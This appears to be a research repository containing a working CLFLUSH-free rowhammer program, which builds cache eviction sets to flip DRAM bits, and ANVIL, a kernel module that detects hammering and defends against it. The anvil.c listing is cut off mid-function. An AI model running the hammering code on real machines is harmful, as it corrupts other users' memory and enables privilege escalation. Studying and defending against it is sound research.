├── anvil
│   ├── anvil.png
│   ├── Makefile
│   ├── README
│   ├── anvil.h
│   └── anvil.c
├── README.md
└── CLFLUSH-free_rowhammer.cpp
--------------------------------------------------------------------------------
/anvil/anvil.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zaweke/rowhammer/HEAD/anvil/anvil.png
--------------------------------------------------------------------------------
/anvil/Makefile:
--------------------------------------------------------------------------------
obj-m += anvil.o

all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# CLFLUSH-free rowhammer

This is an implementation of the CLFLUSH-free rowhammering attack.
The directory 'anvil' contains the code and README for ANVIL.

To compile and run the CLFLUSH-free rowhammering program:

    $ g++ -std=c++11 -o CLFLUSH-free_rowhammer CLFLUSH-free_rowhammer.cpp

    $ sudo ./CLFLUSH-free_rowhammer
--------------------------------------------------------------------------------
/anvil/README:
--------------------------------------------------------------------------------
ANVIL uses Intel performance counters to detect rowhammer activity
and protects potential victim rows by selectively reading from them.
The process of detecting rowhammering activity is depicted in the flowchart
(anvil.png).

ANVIL is implemented as a Linux loadable kernel module. It has been tested
on an Intel Sandy Bridge machine running Ubuntu 14.04 LTS with Linux kernel
4.0.0. It should work with any Intel processor of the Sandy Bridge or a
later microarchitecture.

Configuration
==============

There are a number of parameters that can be tuned. Their values affect
both the accuracy of rowhammer detection and the performance overhead
imposed on non-hammering applications. All parameters are defined in
"anvil.h". Below is a description of the most important ones:

count_timer_period : This value is "tc" on the flowchart. It specifies the
time period over which last-level cache (LLC) misses are counted in the
first stage of detection. It is given in nanoseconds; the default is 6 ms.
It can be lowered for faster detection of rowhammering activity.

sample_timer_period: This value is "ts" on the flowchart. It specifies the
time period during which load and store samples are taken. It is given in
nanoseconds; the default is 6 ms. It can be lowered for faster detection of
rowhammering activity, but the store and load sampling rates might then
need to be increased to collect enough samples.

LLC_MISS_THRESHOLD: Last-level cache miss threshold. If the LLC miss count
for a period of "tc" exceeds this value, sampling of addresses is
triggered. Lowering this value increases detection accuracy but also
increases the frequency of sampling, which hurts the performance of
non-hammering applications.

LD_LAT_SAMPLE_PERIOD: This value controls the sampling rate of loads.
Lowering it increases the number of load samples taken within the sampling
period. A very low value stresses the system, as more interrupts are
generated as the sampling rate increases.

PRE_STR_SAMPLE_PERIOD: This value controls the sampling rate of stores.
Lowering it increases the number of store samples taken within the sampling
period. A very low value stresses the system, as more interrupts are
generated as the sampling rate increases. Note that this value is much
higher than LD_LAT_SAMPLE_PERIOD. This is because the precise store event
samples all stores (whether they missed the last-level cache or not);
whether a sample is an LLC store miss is checked in software.
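For example, a configuration biased toward faster detection could halve
the timer periods and the miss threshold and double the load sampling
rate in "anvil.h" (illustrative values only, not tuned recommendations):

    #define LD_LAT_SAMPLE_PERIOD 25       /* 2x the load sampling rate */
    #define count_timer_period   3000000  /* tc = 3 ms */
    #define sample_timer_period  3000000  /* ts = 3 ms */
    #define LLC_MISS_THRESHOLD   10000    /* trigger sampling sooner */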
Building and Running
======================

To build the module:

    $ make

The build produces anvil.ko.

To insert the module:

    $ insmod anvil.ko

To remove the module:

    $ rmmod anvil.ko

Compatibility
================
The module has been tested on Intel Sandy Bridge. For later
microarchitectures, the following event number values in "anvil.h" might
need to be changed to match the microarchitecture. The values can be found
in the Intel® 64 and IA-32 Architectures Software Developer's Manual:

LOAD_LATENCY_EVENT
PRECISE_STORE_EVENT
MEM_LOAD_UOPS_MISC_RETIRED_LLC_MISS


On some machines the sampling facility (PEBS) might require a microcode
update. On Ubuntu this can be done by running:

    $ sudo apt-get install intel-microcode

--------------------------------------------------------------------------------
/anvil/anvil.h:
--------------------------------------------------------------------------------

#include <linux/perf_event.h>


#define LOAD_LATENCY_EVENT 0x01CD
#define PRECISE_STORE_EVENT 0x02CD
#define MEM_LOAD_UOPS_MISC_RETIRED_LLC_MISS 0x02D4
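/*
 * The raw codes above use the IA-32 PerfEvtSel encoding that Linux
 * expects for PERF_TYPE_RAW events: config = (umask << 8) | event_select.
 * So 0x01CD is event 0xCD with umask 0x01 (the load-latency event on
 * Sandy Bridge) and 0x02D4 is event 0xD4 with umask 0x02.  Codes for
 * other microarchitectures can be decoded the same way from the SDM.
 */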
/* controls load sampling rate */
#define LD_LAT_SAMPLE_PERIOD 50

/* controls store sampling rate */
#define PRE_STR_SAMPLE_PERIOD 3000

/* count period in nanoseconds */
#define count_timer_period 6000000

/* sample period in nanoseconds */
#define sample_timer_period 6000000

/* last-level cache miss threshold
   that triggers sampling */
#define LLC_MISS_THRESHOLD 20000

/* Maximum number of addresses in the address profile */
#define PROFILE_N 20

/* Maximum number of samples */
#define SAMPLES_MAX 150

/* LLC miss event attribute */
static struct perf_event_attr llc_miss_event = {
	.type = PERF_TYPE_HARDWARE,
	.config = PERF_COUNT_HW_CACHE_MISSES,
	.exclude_user = 0,
	.exclude_kernel = 1,
	.pinned = 1,
};

/* Load uops that miss the LLC */
static struct perf_event_attr l1D_miss_event = {
	.type = PERF_TYPE_RAW,
	.config = MEM_LOAD_UOPS_MISC_RETIRED_LLC_MISS,
	.exclude_user = 0,
	.exclude_kernel = 1,
	.pinned = 1,
};


/* Load latency event attribute */
static struct perf_event_attr load_latency_event = {
	.type = PERF_TYPE_RAW,
	.config = LOAD_LATENCY_EVENT,
	.config1 = 150,				/* load-latency threshold in cycles */
	.sample_type =
		PERF_SAMPLE_ADDR |		/* sample the data address */
		PERF_SAMPLE_DATA_SRC |		/* sample the data source */
		PERF_SAMPLE_WEIGHT,		/* sample the latency in clock cycles */
	.sample_period = LD_LAT_SAMPLE_PERIOD,	/* events between overflow interrupts */
	.exclude_user = 0,			/* count user */
	.exclude_kernel = 1,			/* don't count kernel */
	.precise_ip = 1,			/* enable precise (PEBS) sampling */
	.wakeup_events = 1,			/* wake up on every sample */
	.disabled = 1,
	.pinned = 1,
};

/* precise store event */
static struct perf_event_attr precise_str_event_attr = {
	.type = PERF_TYPE_RAW,
	.config = PRECISE_STORE_EVENT,
	.sample_type =
		PERF_SAMPLE_ADDR |
		PERF_SAMPLE_DATA_SRC,
	.sample_period = PRE_STR_SAMPLE_PERIOD,
	.exclude_user = 0,
	.exclude_kernel = 1,
	.precise_ip = 1,
	.wakeup_events = 1,
	.disabled = 1,
	.pinned = 1,
};

/* Address profile */
typedef struct {
	unsigned long phy_page;		/* physical page frame number */
	unsigned long page;		/* sampled virtual address */
	int ld_st;			/* load or store profile */
	unsigned long llc_total_miss;	/* samples that hit this page */
	unsigned int llc_percent_miss;	/* share of all samples, in percent */
	int cpu;
	unsigned long dummy1;		/* sinks for the refresh reads */
	unsigned long dummy2;
	int hammer;			/* flagged as a potential aggressor */
} profile_t;

/* Address sample */
typedef struct {
	unsigned long phy_page;
	u64 addr;
	u64 lat;
	u64 time;
	unsigned int src;
	int ld_st;			/* sample is load or store */
	int cpu;
} sample_t;

/* for logging */
struct sample_log {
	profile_t profile[PROFILE_N];
	unsigned int record_size;
	unsigned int sample_total;
	unsigned int hammer_threshold;
	int cpu;
};


--------------------------------------------------------------------------------
/CLFLUSH-free_rowhammer.cpp:
--------------------------------------------------------------------------------
/***************************************************************
  A program to test CLFLUSH-free rowhammering

  The program is based on the double-sided rowhammering
  program at https://github.com/google/rowhammer-test/

 **************************************************************/


// Copyright 2015, Google, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
//   http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.

// Small test program to systematically check through the memory to find bit
// flips by double-sided row hammering.
//
// Compilation instructions:
//   g++ -std=c++11 [filename]
//
//   ./CLFLUSH-free_rowhammer [-t nsecs] [-p percentage]
//
// Hammers for nsecs seconds, acquires the described fraction of memory (0.0
// to 0.9 or so).

#include <assert.h>
#include <fcntl.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/sysinfo.h>
#include <time.h>
#include <unistd.h>

#include <algorithm>
#include <map>
#include <utility>
#include <vector>

#define DEBUG

#define TOTAL_ACCESS (1024*1000)/14
#define INDEX_SIZE 210


int dummy, dummy2;
// The fraction of physical memory that should be mapped for testing.
double fraction_of_physical_memory = 0.3;

// The time to hammer before aborting. Defaults to one hour.
uint64_t number_of_seconds_to_hammer = 3600;

// The number of memory reads to try.
uint64_t number_of_reads = 1000*1024;

int pagemap;
uintptr_t end_addr;
const int size = 13;
const int addr_count = 22;

volatile uintptr_t first_addrs[size];
volatile uintptr_t second_addrs[size];
uintptr_t phy_addr1[size];
uintptr_t phy_addr2[size];

// Indexes of conflicting addresses in the access pattern
volatile int indexes1[] = {0,1,2,3,4,5,6,7,8,9,10,
                           12,1,2,3,4,5,6,7,8,9,11};

volatile int indexes2[] = {0,1,2,3,4,5,6,7,8,9,10,
                           12,1,2,3,4,5,6,7,8,9,11};

// Obtain the size of the physical memory of the system.
uint64_t GetPhysicalMemorySize() {
  struct sysinfo info;
  sysinfo(&info);
  return (size_t)info.totalram * (size_t)info.mem_unit;
}

// If physical_address is in the range, put (physical_address, virtual_address)
// into the map.
bool PutPointerIfInAddressRange(const std::pair<uint64_t, uint64_t>& range,
    uint64_t physical_address, uint8_t* virtual_address,
    std::map<uint64_t, uint8_t*>& pointers) {
  if (physical_address >= range.first && physical_address <= range.second) {
    printf("[!] Found desired physical address %lx at virtual %lx\n",
        (uint64_t)physical_address, (uint64_t)virtual_address);
    pointers[physical_address] = virtual_address;
    return true;
  }
  return false;
}

bool IsRangeInMap(const std::pair<uint64_t, uint64_t>& range,
    const std::map<uint64_t, uint8_t*>& mapping) {
  for (uint64_t check = range.first; check <= range.second; check += 0x1000) {
    if (mapping.find(check) == mapping.end()) {
      printf("[!] Failed to find physical memory at %lx\n", check);
      return false;
    }
  }
  return true;
}

uint64_t GetPageFrameNumber(int pagemap, uint8_t* virtual_address) {
  // Read the entry in the pagemap.
  uint64_t value;
  int got = pread(pagemap, &value, 8,
      (reinterpret_cast<uintptr_t>(virtual_address) / 0x1000) * 8);
  assert(got == 8);
  uint64_t page_frame_number = value & ((1ULL << 54)-1);
  return page_frame_number;
}

void SetupMapping(size_t* mapping_size, void** mapping) {
  *mapping_size =
    static_cast<size_t>((static_cast<double>(GetPhysicalMemorySize()) *
        fraction_of_physical_memory));

  *mapping = mmap(NULL, *mapping_size, PROT_READ | PROT_WRITE,
      MAP_POPULATE | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
  assert(*mapping != (void*)-1);

  end_addr = (uintptr_t)((uintptr_t)*mapping + *mapping_size);
  // Initialize the mapping so that the pages are non-empty.
  printf("[!] Initializing large memory mapping ...");
  for (uint64_t index = 0; index < *mapping_size; index += 0x1000) {
    uint64_t* temporary = reinterpret_cast<uint64_t*>(
        static_cast<uint8_t*>(*mapping) + index);
    temporary[0] = index;
  }
  printf("done\n");
}
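// A /proc/self/pagemap entry packs one virtual page's mapping state into
// 64 bits: the low bits hold the page frame number and bit 63 is the
// "page present" flag.  GetPageFrameNumber() above and
// get_physical_addr() below rely on exactly these two fields; reading
// the PFN bits requires root on newer kernels, hence the sudo in the
// README.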

int get_cache_slice(uint64_t phys_addr, int bad_bit) {
  // On a 4-core machine, the CPU's hash function produces a 2-bit
  // cache slice number, where the two bits are defined by "h1" and
  // "h2":
  //
  // h1 function:
  //   static const int bits[] = { 18, 19, 21, 23, 25, 27, 29, 30, 31 };
  // h2 function:
  //   static const int bits[] = { 17, 19, 20, 21, 22, 23, 24, 26, 28, 29, 31 };
  //
  // This hash function is described in the paper "Practical Timing
  // Side Channel Attacks Against Kernel Space ASLR".
  //
  // On a 2-core machine, the CPU's hash function produces a 1-bit
  // cache slice number which appears to be the XOR of h1 and h2.

  // XOR of h1 and h2:
  static const int bits[] = { 17, 18, 20, 22, 24, 25, 26, 27, 28, 30 };

  int count = sizeof(bits) / sizeof(bits[0]);
  int hash = 0;
  for (int i = 0; i < count; i++) {
    hash ^= (phys_addr >> bits[i]) & 1;
  }
  if (bad_bit != -1) {
    hash ^= (phys_addr >> bad_bit) & 1;
  }
  return hash;
}

// Extract the physical page number from a Linux /proc/PID/pagemap entry.
uint64_t frame_number_from_pagemap(uint64_t value) {
  return value & ((1ULL << 54) - 1);
}

uint64_t get_physical_addr(uintptr_t virtual_addr) {
  uint64_t value;
  const int page_size = 0x1000;
  off_t offset = (virtual_addr / page_size) * sizeof(value);
  int got = pread(pagemap, &value, sizeof(value), offset);
  if (got != 8)
    return 0;

  // Check the "page present" flag.
  if (!(value & (1ULL << 63)))
    return 0;

  uint64_t frame_num = frame_number_from_pagemap(value);
  return (frame_num * page_size) | (virtual_addr & (page_size - 1));
}

// Checks whether two addresses map to the same cache set and slice.
bool in_same_cache_set(uint64_t phys1, uint64_t phys2, int bad_bit) {
  // For Sandy Bridge, the bottom 17 bits determine the cache set
  // within the cache slice (or the location within a cache line).
  uint64_t mask = ((uint64_t)1 << 17) - 1;
  return ((phys1 & mask) == (phys2 & mask) &&
          get_cache_slice(phys1, bad_bit) == get_cache_slice(phys2, bad_bit));
}
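// The set/slice test above is what makes CLFLUSH-free hammering work:
// instead of flushing an aggressor row with CLFLUSH, the program reads a
// group of addresses that collide with the aggressor in the same LLC set
// and slice, so the aggressor's cache line is evicted and the next access
// goes to DRAM again.  A minimal sketch of that inner step (this helper is
// illustrative and not called by the program; the real loop is in
// HammerAddressesStandard below):
static inline void evict_by_reading(volatile uintptr_t* evict_set, int n) {
  for (int i = 0; i < n; i++)
    dummy += *(volatile int*)evict_set[i];  // plain reads, no CLFLUSH needed
}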

inline void mfence() {
  asm volatile("mfence");
}

// Measure the time taken to access the given address, in nanoseconds.
int time_access(uintptr_t ptr) {
  struct timespec ts0;
  int rc = clock_gettime(CLOCK_MONOTONIC, &ts0);
  assert(rc == 0);

  dummy += *(volatile int *)ptr;
  mfence();

  struct timespec ts;
  rc = clock_gettime(CLOCK_MONOTONIC, &ts);
  assert(rc == 0);
  return (ts.tv_sec - ts0.tv_sec) * 1000000000
       + (ts.tv_nsec - ts0.tv_nsec);
}


int timing(volatile uintptr_t* addrs, int addr_count, int bad_bit) {
  // Time memory accesses.
  const int runs = 10;
  int times[runs];
  for (int run = 0; run < runs; run++) {
    // Ensure the first address is cached by accessing it.
    dummy += *(volatile int *)addrs[0];
    mfence();
    // Now pull the other addresses through the cache too.
    for (int i = 1; i < addr_count; i++) {
      dummy += *(volatile int *)addrs[i];
    }
    mfence();
    // See whether the first address got evicted from the cache by
    // timing accessing it.
    times[run] = time_access(addrs[0]);
  }

  // Find the median time. We use the median in order to discard
  // outliers. We want to discard outlying slow results which are
  // likely to be the result of other activity on the machine.
  //
  // We also want to discard outliers where memory was accessed
  // unusually quickly. These could be the result of the CPU's
  // eviction policy not using an exact LRU policy.
  std::sort(times, &times[runs]);
  int median_time = times[runs / 2];

  return median_time;
}


int timing_mean(volatile uintptr_t* addrs, int addr_count, int bad_bit) {
  int runs = 10;
  int sum_time = 0;
  for (int i = 0; i < runs; i++)
    sum_time += timing(addrs, addr_count, bad_bit);
  return sum_time / runs;
}

// Get conflicting addresses: returns the virtual and physical
// addresses of an eviction set for start_addr.
int get_conflicting_address(uintptr_t start_addr, int addr_count,
    volatile uintptr_t *addrs, uintptr_t *phy_addrs) {
  const int page_size = 0x1000;
  uintptr_t phys1, phys2;

  addrs[0] = start_addr;
  phys1 = get_physical_addr(addrs[0]);
  phy_addrs[0] = phys1;

  uintptr_t next_addr = start_addr;
  int found = 1;
  while (found < addr_count) {
    if (next_addr >= end_addr)  // make sure it is within the mapping
      return 0;

    next_addr += page_size;
    phys2 = get_physical_addr(next_addr);
    if (in_same_cache_set(phys1, phys2, -1)) {
      addrs[found] = next_addr;
      phy_addrs[found] = phys2;
      found++;
    }
  }

  return 1;
}


uint64_t HammerAddressesStandard(
    const std::pair<uint64_t, uint64_t>& first_range,
    const std::pair<uint64_t, uint64_t>& second_range,
    uint64_t number_of_reads, uint8_t* target_page) {
  volatile uint64_t* first_pointer =
      reinterpret_cast<volatile uint64_t*>(first_range.first);
  volatile uint64_t* second_pointer =
      reinterpret_cast<volatile uint64_t*>(second_range.first);
  struct timespec ts0, ts;


  // Get conflicting addresses (eviction set)
  while (!get_conflicting_address((uintptr_t)first_pointer, size,
                                  first_addrs, phy_addr1));
  while (!get_conflicting_address((uintptr_t)second_pointer, size,
                                  second_addrs, phy_addr2));

  // Do several trials
  printf("~~~~~~~~~~~~~~~~~~~~~~\n");
  for (int trial = 0; trial < 10; trial++) {
    // Get start time
    int rc = clock_gettime(CLOCK_MONOTONIC, &ts0);
    assert(rc == 0);

    // Hammer using the eviction set (loop reconstructed from the index
    // tables declared above): walk both aggressors' eviction sets in
    // the interleaved order given by indexes1/indexes2, so the
    // aggressor rows keep being evicted and re-read from DRAM.
    for (int k = 0; k < TOTAL_ACCESS; k++) {
      for (int i = 0; i < addr_count; i++) {
        dummy += *(volatile int *)first_addrs[indexes1[i]];
        dummy2 += *(volatile int *)second_addrs[indexes2[i]];
      }
    }

    // Report the time taken for this trial.
    rc = clock_gettime(CLOCK_MONOTONIC, &ts);
    assert(rc == 0);
    printf("trial %d: %ld ns\n", trial,
           (ts.tv_sec - ts0.tv_sec) * 1000000000L
           + (ts.tv_nsec - ts0.tv_nsec));
  }

  return number_of_reads;
}

typedef uint64_t HammerFunction(
    const std::pair<uint64_t, uint64_t>& first_range,
    const std::pair<uint64_t, uint64_t>& second_range,
    uint64_t number_of_reads, uint8_t* target_add);

// A comprehensive test that attempts to hammer adjacent rows for a given
// assumed row size (and assumptions of sequential physical addresses for
// various rows).
uint64_t HammerAllReachablePages(uint64_t presumed_row_size,
    void* memory_mapping, uint64_t memory_mapping_size, HammerFunction* hammer,
    uint64_t number_of_reads) {
  // This vector will be filled with all the pages we can get access to for a
  // given row size.
  std::vector<std::vector<uint8_t*>> pages_per_row;
  uint64_t total_bitflips = 0;
  uint8_t* target_add = NULL;

  pages_per_row.resize(memory_mapping_size / presumed_row_size);
  pagemap = open("/proc/self/pagemap", O_RDONLY);
  assert(pagemap >= 0);

  printf("[!] Identifying rows for accessible pages ... ");
  for (uint64_t offset = 0; offset < memory_mapping_size; offset += 0x1000) {
    uint8_t* virtual_address = static_cast<uint8_t*>(memory_mapping) + offset;
    uint64_t page_frame_number = GetPageFrameNumber(pagemap, virtual_address);
    uint64_t physical_address = page_frame_number * 0x1000;
    uint64_t presumed_row_index = physical_address / presumed_row_size;
    //printf("[!] put va %lx pa %lx into row %ld\n", (uint64_t)virtual_address,
    //       physical_address, presumed_row_index);
    if (presumed_row_index >= pages_per_row.size()) {
      pages_per_row.resize(presumed_row_index + 1);
    }
    pages_per_row[presumed_row_index].push_back(virtual_address);
    //printf("[!] done\n");
  }
  printf("Done\n");

  // We should have some pages for most rows now.
  for (uint64_t row_index = 0; row_index + 2 < pages_per_row.size();
       ++row_index) {
    if ((pages_per_row[row_index].size() != 64) ||
        (pages_per_row[row_index+2].size() != 64)) {
      printf("[!] Can't hammer row %ld - only got %ld/%ld pages "
             "in the rows above/below\n",
             row_index+1, pages_per_row[row_index].size(),
             pages_per_row[row_index+2].size());
      continue;
    } else if (pages_per_row[row_index+1].size() == 0) {
      printf("[!] Can't hammer row %ld, got no pages from that row\n",
             row_index+1);
      continue;
    }
    printf("[!] Hammering rows %ld/%ld/%ld of %ld (got %ld/%ld/%ld pages)\n",
           row_index, row_index+1, row_index+2, pages_per_row.size(),
           pages_per_row[row_index].size(), pages_per_row[row_index+1].size(),
           pages_per_row[row_index+2].size());
    // Iterate over all pages we have for the first row.
    for (uint8_t* first_row_page : pages_per_row[row_index]) {
      // Iterate over all pages we have for the second row.
      for (uint8_t* second_row_page : pages_per_row[row_index+2]) {
        // Set all the target pages to 0xFF.
        for (uint8_t* target_page : pages_per_row[row_index+1]) {
          memset(target_page, 0xFF, 0x1000);
          target_add = target_page;
        }
        // Now hammer the two pages we care about.
        std::pair<uint64_t, uint64_t> first_page_range(
            reinterpret_cast<uint64_t>(first_row_page),
            reinterpret_cast<uint64_t>(first_row_page+0x1000));
        std::pair<uint64_t, uint64_t> second_page_range(
            reinterpret_cast<uint64_t>(second_row_page),
            reinterpret_cast<uint64_t>(second_row_page+0x1000));
        hammer(first_page_range, second_page_range, number_of_reads, target_add);
        // Now check the target pages.
        uint64_t number_of_bitflips_in_target = 0;
        for (const uint8_t* target_page : pages_per_row[row_index+1]) {
          for (uint32_t index = 0; index < 0x1000; ++index) {
            if (target_page[index] != 0xFF) {
              ++number_of_bitflips_in_target;
            }
          }
        }
        if (number_of_bitflips_in_target > 0) {
          printf("[!] Found %ld flips in row %ld (%lx to %lx) when hammering "
                 "%lx and %lx\n", number_of_bitflips_in_target, row_index+1,
                 ((row_index+1)*presumed_row_size),
                 ((row_index+2)*presumed_row_size)-1,
                 GetPageFrameNumber(pagemap, first_row_page)*0x1000,
                 GetPageFrameNumber(pagemap, second_row_page)*0x1000);
          total_bitflips += number_of_bitflips_in_target;
        }
      }
    }
  }
  return total_bitflips;
}

void HammerAllReachableRows(HammerFunction* hammer, uint64_t number_of_reads) {
  size_t mapping_size;
  void* mapping;
  SetupMapping(&mapping_size, &mapping);

  HammerAllReachablePages(1024*256, mapping, mapping_size,
                          hammer, number_of_reads);
}

void HammeredEnough(int sig) {
  printf("[!] Spent %ld seconds hammering, exiting now.\n",
         number_of_seconds_to_hammer);
  fflush(stdout);
  fflush(stderr);
  exit(0);
}

int main(int argc, char** argv) {
  // Turn off stdout buffering when it is a pipe.
  setvbuf(stdout, NULL, _IONBF, 0);

  int opt;
  while ((opt = getopt(argc, argv, "t:p:")) != -1) {
    switch (opt) {
      case 't':
        number_of_seconds_to_hammer = atoi(optarg);
        break;
      case 'p':
        fraction_of_physical_memory = atof(optarg);
        break;
      default:
        fprintf(stderr, "Usage: %s [-t nsecs] [-p percent]\n",
                argv[0]);
        exit(EXIT_FAILURE);
    }
  }

  signal(SIGALRM, HammeredEnough);

  printf("[!] Starting the testing process...\n");
  alarm(number_of_seconds_to_hammer);
  HammerAllReachableRows(&HammerAddressesStandard, number_of_reads);
}

--------------------------------------------------------------------------------
/anvil/anvil.c:
--------------------------------------------------------------------------------
#define DEBUG

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/percpu.h>
#include <linux/perf_event.h>
#include <linux/hrtimer.h>
#include <linux/ktime.h>
#include <linux/workqueue.h>
#include <linux/cpumask.h>
#include <linux/sched.h>
#include <linux/mm.h>
#include <linux/highmem.h>
#include <asm/uaccess.h>
#include <asm/io.h>

#include "anvil.h"

#define MIN_SAMPLES 0
#define REFRESHED_ROWS 1

#define get_bank(page) ((((page)>>2)&7)^(((page)>>6)&7))

MODULE_LICENSE("GPL");

static struct hrtimer sample_timer;
static ktime_t ktime;
static u64 old_val, val;
static u64 old_l1D_val, l1D_val, miss_total;
static sample_t sample_buffer[SAMPLES_MAX];
static int sampling;
static int start_sampling = 0;
static int sample_head;
static unsigned int sample_total;
static profile_t profile[PROFILE_N];
static unsigned int record_size;
/* counts the number of times the stage-1 (LLC miss) threshold was
   passed (sampling was done) */
static unsigned long L1_count = 0;
/* counts the number of times hammering was detected */
static unsigned long L2_count = 0;
static unsigned long refresh_count = 0;
static unsigned int hammer_threshold;
unsigned long dummy;

/* for logging */
static struct sample_log log[25000];
static int log_index = 0;

static struct workqueue_struct *action_wq;
static struct workqueue_struct *llc_event_wq;
static struct work_struct task;
static struct work_struct task2;

static void sort(void);
static void build_profile(void);
DEFINE_PER_CPU(struct perf_event *, llc_event);
DEFINE_PER_CPU(struct perf_event *, l1D_event);
DEFINE_PER_CPU(struct perf_event *, ld_lat_event);
DEFINE_PER_CPU(struct perf_event *, precise_str_event);

void action_wq_callback(struct work_struct *work);
void llc_event_wq_callback(struct work_struct *work);

void llc_event_callback(struct perf_event *event,
		struct perf_sample_data *data,
		struct pt_regs *regs) {}

void l1D_event_callback(struct perf_event *event,
		struct perf_sample_data *data,
		struct pt_regs *regs) {}

/* Returns the pfn of the page "inc" rows above the page "phy" in a base row.
   @input:  phy - physical page in the base DRAM row
   @input:  inc - offset from the base row
   @return: pfn of the page in row (base row + inc) */
static unsigned long get_row_plus(unsigned long phy, int inc)
{
	unsigned long bank_old = get_bank(phy);
	unsigned long row_new = (phy>>6) + inc;
	unsigned long bank_new = (row_new & 0x7) ^ bank_old;
	unsigned long rank_new = (phy>>7)&1;

	return (unsigned long)((row_new << 6) | (rank_new << 5) | (bank_new << 2) | (phy & 0x3));
}

/* Returns the pfn of the page "dec" rows below the page "phy" in a base row.
   @input:  phy - physical page in the base DRAM row
   @input:  dec - offset from the base row
   @return: pfn of the page in row (base row - dec) */
static unsigned long get_row_minus(unsigned long phy, int dec)
{
	unsigned long bank_old = get_bank(phy);
	unsigned long row_new = (phy>>6) - dec;
	unsigned long bank_new = (row_new & 0x7) ^ bank_old;
	unsigned long rank_new = (phy>>7)&1;

	return (unsigned long)((row_new << 6) | (rank_new << 5) | (bank_new << 2) | (phy & 0x3));
}
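/*
 * get_bank() hashes the bank from the pfn by XORing bank bits 2-4 with
 * row bits 6-8, so a worked example (illustrative) for pfn 0x1234:
 * (0x1234>>2)&7 = 5 and (0x1234>>6)&7 = 0, giving bank 5 ^ 0 = 5.
 * Because the row bits take part in that hash, get_row_plus() and
 * get_row_minus() re-XOR the new row's low bits into bank_new when they
 * step to an adjacent row.  This mapping is hard-coded for the authors'
 * Sandy Bridge test machine and will differ on other memory
 * configurations.
 */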

/* Convert a virtual address from a user process into a physical address.
   @input:  mm   - memory descriptor of the user process
   @input:  virt - virtual address
   @return: corresponding physical address of "virt" */
static unsigned long virt_to_phy(struct mm_struct *mm, unsigned long virt)
{
	unsigned long phys;
	struct page *pg;
	int ret = get_user_pages(NULL,
				 mm,
				 virt,
				 1,	/* one page */
				 0,	/* not for write */
				 0,	/* no force */
				 &pg,
				 NULL);

	if (ret <= 0)
		return 0;
	/* get physical address */
	phys = page_to_phys(pg);
	return phys;
}

/* Interrupt handler for a store sample */
void precise_str_callback(struct perf_event *event,
		struct perf_sample_data *data,
		struct pt_regs *regs)
{
	/* Check the source of the store; record the sample only if it was
	   served by local DRAM (bit 7 of the data-source encoding). */
	if (data->data_src.val & (1<<7)) {

		sample_buffer[sample_head].phy_page = virt_to_phy(current->mm, data->addr)>>12;
		if (sample_buffer[sample_head].phy_page > 0) {
			sample_buffer[sample_head].addr = data->addr;
			/* limit sample index */
			if (++sample_head > SAMPLES_MAX-1)
				sample_head = SAMPLES_MAX-1;

			sample_total++;
		}
	}
}

/* Interrupt handler for a load sample */
void load_latency_callback(struct perf_event *event,
		struct perf_sample_data *data,
		struct pt_regs *regs)
{
	sample_buffer[sample_head].phy_page = virt_to_phy(current->mm, data->addr)>>12;

#ifdef DEBUG
	sample_buffer[sample_head].addr = data->addr;
	sample_buffer[sample_head].lat = data->weight;
#endif

	/* limit sample index */
	if (++sample_head > SAMPLES_MAX-1)
		sample_head = SAMPLES_MAX-1;

	sample_total++;
}

void llc_event_wq_callback(struct work_struct *work)
{
	int cpu;
	u64 enabled, running;
	u64 ld_miss;

	/* If we were sampling, stop sampling and analyze the samples */
	if (sampling) {
		/* stop sampling */
		for_each_online_cpu(cpu) {
			perf_event_disable(per_cpu(ld_lat_event, cpu));
			perf_event_disable(per_cpu(precise_str_event, cpu));
		}
		sampling = 0;
		/* start the task that analyzes samples and takes action */
		queue_work(action_wq, &task);
	}
	else if (start_sampling) {
		/* update the MEM_LOAD_UOPS_MISC_RETIRED_LLC_MISS value */
		l1D_val = 0;
		for_each_online_cpu(cpu) {
			l1D_val += perf_event_read_value(per_cpu(l1D_event, cpu),
							 &enabled, &running);
		}

		ld_miss = l1D_val - old_l1D_val;

		/* Sample loads, stores or both based on the LLC load miss count */
		if (ld_miss >= (miss_total*9)/10) {
			for_each_online_cpu(cpu) {
				perf_event_enable(per_cpu(ld_lat_event, cpu));	/* sample loads only */
			}
		}

		else if (ld_miss < miss_total/10) {
			for_each_online_cpu(cpu) {
				perf_event_enable(per_cpu(precise_str_event, cpu));	/* sample stores only */
			}
		}

		else {
			for_each_online_cpu(cpu) {
				/* sample both */
				perf_event_enable(per_cpu(ld_lat_event, cpu));
				perf_event_enable(per_cpu(precise_str_event, cpu));
			}
		}

		sample_total = 0;
		record_size = 0;
		sample_head = 0;

		/* log how many times we passed the threshold */
		L1_count++;
		start_sampling = 0;
		sampling = 1;
	}

	old_l1D_val = l1D_val;
}

/* look at the sample profile and take action */
void action_wq_callback(struct work_struct *work)
{
	int rec, log_;
	unsigned long pfn1, pfn2;
	unsigned long *virt;
	struct page *pg1, *pg2;
	int i;

	/* group samples based on physical pages */
	build_profile();
	/* sort the profile, address with the highest number
	   of samples first */
	sort();

#ifdef DEBUG
	log_ = 0;
#endif

	if (miss_total > LLC_MISS_THRESHOLD) {	/* if the miss count is still high */
		printk("samples = %u\n", sample_total);
		/* calculate the hammer threshold */
		hammer_threshold = (LLC_MISS_THRESHOLD*sample_total)/miss_total;

		/* check for potential aggressors */
		for (rec = 0; rec < record_size; rec++) {
			if ((profile[rec].llc_total_miss >= hammer_threshold/2) &&
			    (sample_total >= MIN_SAMPLES)) {
#ifdef DEBUG
				log_ = 1;
				profile[rec].hammer = 1;
				L2_count++;
#endif
				/* potential hammering detected, deploy refreshes */
				for (i = 1; i <= REFRESHED_ROWS; i++) {
